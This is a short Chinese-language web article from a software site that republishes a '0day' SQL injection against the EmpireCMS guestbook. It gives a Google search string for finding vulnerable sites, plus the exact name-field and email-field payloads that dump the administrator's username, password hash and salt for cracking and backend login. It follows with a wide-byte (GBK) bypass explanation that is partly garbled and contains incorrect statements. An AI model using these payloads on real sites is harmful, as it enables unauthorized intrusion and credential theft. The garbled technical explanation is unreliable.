帝国CMS留言板漏洞pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报帝国CMS留言板漏洞

帝国CMS留言板漏洞


2009/7/20  编辑:佚名 来源:本站整理  关键词:

帝国CMS留言板漏洞

 

深灰丢出来的0day.
       去寻找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
       例如:www.xxx.com/e/tool/gbook/?bid=1
       出来的是帝国CMS的留言本,就在姓名处写:縗\
       联系邮箱处写:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
       提交后爆出账号密码
       测试方法:利用google搜索关键字 inurl:e/tool/gbook/?bid=1, 之后依照上面方式留言, 显示结果即爆出管理员帐号和密码md5值, 破解密码登陆后台。
       只公布了oday的利用方法, 并没有说明其中的一些原理, 就在今天壮壮胆, 跟大家分析一下
       1.这个漏洞就是php注入, 上面的注入语句大家也看到了
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
       查询phome_enewsuser表段中username,password,rnd三个字段信息, 查询的条件是userid=1, 排就在第一位的, 估计也是管理员, 当然如果网站存就在多个管理员, 可以能够把1换成其他数字
       2.姓名处写:縗\
       为什么要写:縗\?这里涉及到一个双字节漏洞
       要知道这个有请求需要了解几个知识点
       1)如果安装过php环境的网友朋友应该知道, 就在php.ini中有一个get_magic_quotes_gpc功能
       当这个功能打开时, 所有的 ' (单引号), " (双引号), \ (反斜线) and 空字符会全自动加上转义符\
       当这个功能启动时, 字符串可以能够直接入库
       2)注入大家知道, 要用到“and” , and被php转义为%df, 由于 get_magic_quotes_gpc启动, 所以全自动加入了“\” , “\"转换为十六进制后为%5C 。
       由于看出, 其实我们我自己输入“and”被php转义成为%df%5c
       但是当这些字符进入mysql数据信息库来进行GBK编码时, 就一定会被认为这是一个宽字符,也就是"縗"
       总结一下:
       %df'?==>? %df\'??==> ?%df%5c'??==> ?縗'
       这就是php中常见的宽字节漏洞, 也称双字节漏洞
       如我们我自己就在平时的检测过程中替代本来的 and 1=1
       %df%27 or 1=1/*
       %df%27 or 1=2/*
 

相关文章
  • 印加帝国遗迹马丘比丘上空拍到UFO群快速飞过
  • 第三帝国的秘密地图指出纳粹人已经找到通往地心的入口?
  • 英国游客拍到神秘不明飞行体入侵纽约帝国大厦上空!
  • 第三帝国精神控制武器揭秘
  • 纽约帝国大厦出现濒临绝种动物的影像!希望人类能改变意识
  • 帝国CMS留言板漏洞
  • 帝国CMS的最新0day
  • 帝国下载系统2.5正式版下载
  • 最新揭露微软帝国的25大秘密
  • 龙帝国GHOSTXP SP3 V7.5 0312
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图